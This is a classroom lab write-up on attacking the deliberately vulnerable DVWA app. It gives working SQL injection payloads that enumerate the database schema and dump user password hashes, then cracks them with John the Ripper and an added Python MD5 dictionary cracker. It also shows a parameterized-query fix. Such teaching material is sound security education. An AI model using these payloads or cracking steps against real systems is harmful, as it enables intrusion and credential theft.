Manual SQL Injection, John the Ripper

Section 0. Background Information
- What is Damn Vulnerable Web App (DVWA)?
- Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
- Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications, and aid teachers/students to teach/learn web application security in a classroom environment.
 
- Pre-Requisite Lab
- Lab Notes
- In this lab we will do the following:
- We inject always-true SQL statements into the SQL Injection User ID field with security set to low.
- We will obtain the username and raw-MD5 password contents from the users table.
- We will use John the Ripper to crack the raw-MD5 password hash for each user.
 
 
 
- Legal Disclaimer
- This lab is for educational purposes only.
 
Section 1. Configure Fedora14 Virtual Machine Settings
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
 - Start --> All Program --> VMWare --> VMWare Player
 
 
- Edit Fedora14 Virtual Machine Settings
- Instructions:
- Highlight fedora14
 - Click Edit virtual machine settings
 
 
 - Edit Network Adapter
 - Instructions:
- Highlight Network Adapter
 - Select Bridged
 - Click on the OK Button.
 
 
Section 2. Login to Fedora14
- Start Fedora14 VM Instance
- Instructions:
- Start Up VMWare Player
 - Select Fedora14
 - Play virtual machine
 
 
 - Login to Fedora14
- Instructions:
- Login: student
- Password: <whatever you set it to>.
 
 
 
Section 3. Open Console Terminal and Retrieve IP Address
- Start a Terminal Console
- Instructions:
- Applications --> Terminal
 
 
 - Switch user to root
- Instructions:
- su - root
- <whatever you set the root password to>
 
 
 - Get IP Address
- Instructions:
- ifconfig -a
 
 - Notes:
- As indicated below, my IP address is 192.168.1.106.
 - Please record your IP address.
 
 
 
Section 4. Temporarily Disable SELinux and Firewall
- Start a Terminal Console
- Instructions:
- sestatus
- If "SELinux status:" is disabled, OR if "Current mode:" is permissive, skip the next steps and continue to the next section.
- If "SELinux status:" is enabled AND "Current mode:" is enforcing, continue with the next steps.
 
 - Notes:
- In my case, I need to temporarily put SELinux in permissive mode to demonstrate basic attacks on DVWA.
 
 
 - Place selinux in permissive mode
- Instructions:
- echo 0 > /selinux/enforce
- Writing "0" to the enforce file puts SELinux in permissive mode until the next reboot; `setenforce 0` does the same thing. Policy violations are still logged, just no longer blocked.
 
 - sestatus
- Notice that "Current mode:" changed  				to permissive.
 
 
 
 - Disable Firewall
- Instructions:
- service iptables save
- This writes the running rule set to disk. It is not strictly necessary unless you have made recent changes to the firewall that you want to keep.

- service iptables stop
- This flushes the rules and stops the firewall, so the DVWA web port on Fedora is reachable from the BackTrack VM. Remember to start it again after the lab.
 
 
 
 
Section 5. Configure BackTrack Virtual Machine Settings
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
- Start --> All Program --> VMWare --> VMWare Player
 
 
 - Edit BackTrack Virtual Machine Settings
- Instructions:
- Highlight BackTrack5R1
 - Click Edit virtual machine settings
 
 
 - Edit Network Adapter	
- Instructions:
- Highlight Network Adapter
 - Select Bridged
- Click on the OK Button.
 
 
 
Section 6. Login to BackTrack
- Start BackTrack VM Instance
- Instructions:
- Start Up VMWare Player
 - Select BackTrack5R1
 - Play virtual machine
 
 
 - Login to BackTrack
- Instructions:
- Login: root
- Password: toor, or <whatever you changed it to>.
 
 
- Bring up the GNOME desktop
- Instructions:
- Type startx
 
 
 
Section 7. Open Console Terminal and Retrieve IP Address
- Open a console terminal
- Instructions:
- Click on the console terminal
 
 
 - Get IP Address
- Instructions:
- ifconfig -a
 
 - Notes:
- As indicated below, my IP address is 192.168.1.105.
 - Please record your IP address.
 
 
 
Section 8. Login to DVWA
- Start Firefox
- Instructions:
- Click on Firefox
 
 
 - Login to DVWA
- Instructions:
- Start up Firefox on BackTrack
- Place http://192.168.1.106/dvwa/login.php in the address bar.
- Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
 
 - Login: admin
 - Password: password
 - Click on Login
 
 
 
Section 9. Set Security Level
- Set DVWA Security Level
- Instructions:
- Click on DVWA Security, in the left  			hand menu.
 - Select "low"
 - Click Submit
 
 
 
Section 10. Manual SQL Injection
- SQL Injection Menu
- Instructions:
- Select "SQL Injection" from the left  			navigation menu.
 
 
 - Basic Injection
- Instructions:
- Input "1" into the text box.
 - Click Submit.
- Note: the page is supposed to print the ID, First name, and Surname for the requested user to the screen.
 
 - Notes:
- Below is the PHP select statement that we will be exploiting. The user-supplied value $id is concatenated straight into the query string with no validation or escaping, so a single quote in the input ends the string literal and everything after it is parsed as SQL.
- $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
 
 
 
 - Always True Scenario
- Instructions:
- Input the below text into the User ID Textbox (See Picture). The resulting query in the Database Statement below shows the injected string: %' or '0'='0
 - Click Submit
 
 - Notes:
- In this scenario, we are asking the database for all records that match the false condition together with all records that match the true condition, which is every row.
- %' - The % is a literal character here (the comparison uses =, not LIKE), so user_id will not equal it and this part is false. The closing quote ends the application's string literal so the rest of the input is treated as SQL.
- '0'='0 - Is always true, because 0 always equals 0. The application's own trailing quote completes the final string, which is why the payload ends without one.
 
 - Database Statement
- mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';
 
 
 
 - Display Database Version
- Instructions:
- Input the below text into the User ID  			Textbox (See Picture).
- %' or 0=0 union select null, version() #
 
 - Click Submit
 
 - Notes:
- Notice in the last displayed line, 5.1.60 is displayed in the Surname position.
- This is the version of the MySQL server. The UNION works because it returns the same number of columns (two) as the original SELECT; null fills the first column and the trailing # comments out the application's closing quote.
 
 
 - Display Database User
- Instructions:
- Input the below text into the User ID  			Textbox (See Picture).
- %' or 0=0 union select null, user() #
 
 
- Notes:
- Notice in the last displayed line, root@localhost is displayed in the Surname position.
- This is the MySQL account the PHP code connects with. Because it is root, every database on the server, not just dvwa, is readable through this injection point.
 
 
 - Display Database Name
- Instructions:
- Input the below text into the User ID  			Textbox (See Picture).
- %' or 0=0 union select null, database() #
 
 
- Notes:
- Notice in the last displayed line, dvwa is displayed in the Surname position.
- This is the name of the current database.
 
 
 - Display all tables in information_schema
- Instructions:
- Input the below text into the User ID  			Textbox (See Picture).
- %' and 1=0 union select null, table_name from information_schema.tables #
 
 - Click Submit
 
 - Notes:
- Now we are displaying all the tables listed in information_schema. The "and 1=0" makes the original SELECT return nothing, so only the UNIONed rows appear on the page.
- INFORMATION_SCHEMA is the information database, the place that stores metadata about all the other databases that the MySQL server maintains.
 
 
 - Display all the user tables in  	information_schema
- Instructions:
- Input the below text into the User ID  			Textbox (See Picture).
- %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%' #
 
 - Click Submit
 
 - Notes:
- Now we are displaying all the tables whose name starts with the prefix "user", across every database the connecting account can see.
 
 
- Display all the columns of the users table via information_schema
- Instructions:
- Input the below text into the User ID  			Textbox (See Picture).
- %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
 
 - Click Submit
 
 - Notes:
- Now we are displaying all the columns in  		the users table.
- Notice there are user_id, first_name, last_name, user and password columns. The 0x0a in concat() is a newline, used to separate the two values inside the single column the page displays.
 
 
- Display the contents of the users table
- Instructions:
- Input the below text into the User ID  			Textbox (See Picture).
- %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
 
 - Click Submit
 
 - Notes:
- Now we have dumped every username together with its password hash. The hashes are unsalted MD5, which is what makes the cracking step in the next sections fast.
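The vulnerable query and the payloads from this section, as an added example that is not part of the original lab: a Python stand-in for the low-security DVWA lookup, with the parameterized form beside it. It uses sqlite3 rather than MySQL, so the comment marker and string concatenation are swapped as noted in the code; the user rows and their plaintext passwords are constructed from DVWA's default seed data (an assumption), and the function names are mine.

```python
import hashlib
import sqlite3

# Constructed sample rows modelled on DVWA's default users seed data
# (assumption: these plaintext passwords are DVWA's defaults; the live
# table also has columns such as avatar that are omitted here).
SEED_USERS = [
    (1, "admin", "admin", "admin", "password"),
    (2, "Gordon", "Brown", "gordonb", "abc123"),
    (3, "Hack", "Me", "1337", "charley"),
    (4, "Pablo", "Picasso", "pablo", "letmein"),
    (5, "Bob", "Smith", "smitty", "password"),
]


def make_db():
    """In-memory stand-in for dvwa.users; passwords stored as raw MD5 like DVWA."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        [(uid, fn, ln, u, hashlib.md5(pw.encode()).hexdigest())
         for uid, fn, ln, u, pw in SEED_USERS],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirrors DVWA's low-security query: the raw input is spliced into the SQL string."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, user_id):
    """Hardened form: the value travels as a bound parameter, never as SQL text."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


# Payloads from the lab, adjusted for SQLite (assumptions for this stand-in):
# the line comment is "-- " instead of MySQL's "#", and concatenation is "||"
# instead of concat(). char(10) is the 0x0a newline the lab uses as a separator.
ALWAYS_TRUE = "%' or '0'='0"
DUMP_CREDS = "%' and 1=0 union select null, user || char(10) || password from users -- "


def dump_credentials(conn):
    """Run the UNION payload and split each 'user\\nhash' cell back into a tuple."""
    rows = lookup_vulnerable(conn, DUMP_CREDS)
    return sorted(tuple(surname.split("\n")) for _, surname in rows)


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "1"))               # the intended single row
    print(len(lookup_vulnerable(db, ALWAYS_TRUE)))  # every row comes back
    print(lookup_parameterized(db, ALWAYS_TRUE))    # empty: the payload is just a string
    for user, digest in dump_credentials(db):
        print(f"{user}:{digest}")                   # the user:hash format john expects
```

The parameterized lookup returns nothing for the always-true payload because the whole string is compared against user_id as a value; no quote in the input can reach the SQL parser.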
 
 
 
Section 11. Create Password Hash File
- Create Password Hash File
- Instructions:
- Highlight both admin and the password  			hash
 - Right Click
 - Copy
 
 
 - Open Notepad
- Instructions:
- Applications --> Wine --> Programs -->  			Accessories --> Notepad
 
 
 - Paste in Notepad
- Instructions:
- Edit --> Paste
 
 
 - Format in Notepad
- Instructions:
- Place a ":" immediately after admin
- Make sure your cursor is immediately after the ":" and hit the delete button, so the hash moves up onto the same line.
- Now you should see the user admin and the password hash separated by a ":" on one line, in the form admin:<32 hex characters>, with no spaces.
- Cut the username and password combinations for gordonb, 1337, pablo, and smitty from (Section 11, Step 1) and paste them into this file in the same user:hash form, one per line.
 
 
 - Save in Notepad
- Instructions:
- Navigate to --> /pentest/passwords/john
 - Name the file name -->  			dvwa_password.txt
 - Click Save
 
 
 
Section 12. Proof of Lab Using John the Ripper
- Proof of Lab
- Instructions:
- Bring up a new terminal, see (Section  			7, Step 1)
 - cd /pentest/passwords/john
- ./john --format=raw-MD5 dvwa_password.txt
- The format must be given explicitly because a bare 32-hex-character hash is ambiguous; john prints each recovered password followed by its username in parentheses.
 - date
 - echo "Your Name"
- Replace the string "Your Name" with  				your actual name.
 - e.g., echo "John Gray"
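An added example, not the lab's own code, of what the `--format=raw-MD5` run does with the file built in Section 11: parse the `user:hash` lines, hash each wordlist candidate once and match it against every user. The sample file and wordlist are constructed here (the plaintexts assume DVWA's default passwords) and the hashes are computed at run time rather than copied; one malformed line and one password missing from the wordlist are included so the parser's skip and an uncracked user are both exercised.

```python
import hashlib
import re

MD5_HEX = re.compile(r"^[0-9a-fA-F]{32}$")


def build_hash_file(plaintexts):
    """Produce the user:hash lines the lab assembles by hand in Notepad.

    Constructed sample input: each hash is the raw MD5 of the given plaintext,
    computed here so the file is self-consistent.
    """
    return "\n".join(
        f"{user}:{hashlib.md5(pw.encode()).hexdigest()}" for user, pw in plaintexts.items()
    )


def parse_hash_file(text):
    """Parse user:hash lines; skip blanks and anything that is not 32 hex digits.

    Stray spaces left over from the Notepad edit are stripped rather than
    treated as part of the hash.
    """
    creds = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        user, sep, digest = line.partition(":")
        digest = digest.strip()
        if not sep or not MD5_HEX.match(digest):
            continue  # not a raw-MD5 entry; john rejects such lines for this format too
        creds.append((user.strip(), digest.lower()))
    return creds


def crack_raw_md5(creds, wordlist):
    """Dictionary attack: hash each candidate once and match it against every user.

    Unsalted MD5 means one digest per candidate serves all users at once, which is
    why two users sharing a password fall together.
    """
    by_digest = {}
    for user, digest in creds:
        by_digest.setdefault(digest, []).append(user)
    found = {}
    for word in wordlist:
        digest = hashlib.md5(word.encode()).hexdigest()
        for user in by_digest.get(digest, ()):
            found[user] = word
        if len(found) == len(creds):
            break  # everything cracked; no need to finish the wordlist
    return found


# Constructed sample: DVWA's five users with their default passwords (assumption),
# plus one deliberately malformed line that the parser must skip.
SAMPLE_PLAINTEXTS = {
    "admin": "password",
    "gordonb": "abc123",
    "1337": "charley",
    "pablo": "letmein",
    "smitty": "password",
}
SAMPLE_FILE = build_hash_file(SAMPLE_PLAINTEXTS) + "\nbroken:not-a-hash\n"

# Small constructed wordlist; "charley" is left out on purpose so one user stays uncracked.
SAMPLE_WORDLIST = ["123456", "password", "qwerty", "letmein", "abc123", "welcome"]


def run_sample():
    """Crack the constructed file with the constructed wordlist; returns {user: password}."""
    return crack_raw_md5(parse_hash_file(SAMPLE_FILE), SAMPLE_WORDLIST)


if __name__ == "__main__":
    for user, pw in run_sample().items():
        print(f"{pw:<16} ({user})")  # john-style "password (user)" output line
```

The real john run differs only in scale: its default wordlist and rules generate far more candidates, and it keeps the cracked pairs in john.pot so a repeat run reports them without re-hashing.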
 
 
- Proof of Lab Instructions:
- Do a <PrtScn>
 - Paste into a word document
 - Email to CSIRT247@Gmail.Com
 
 
 
 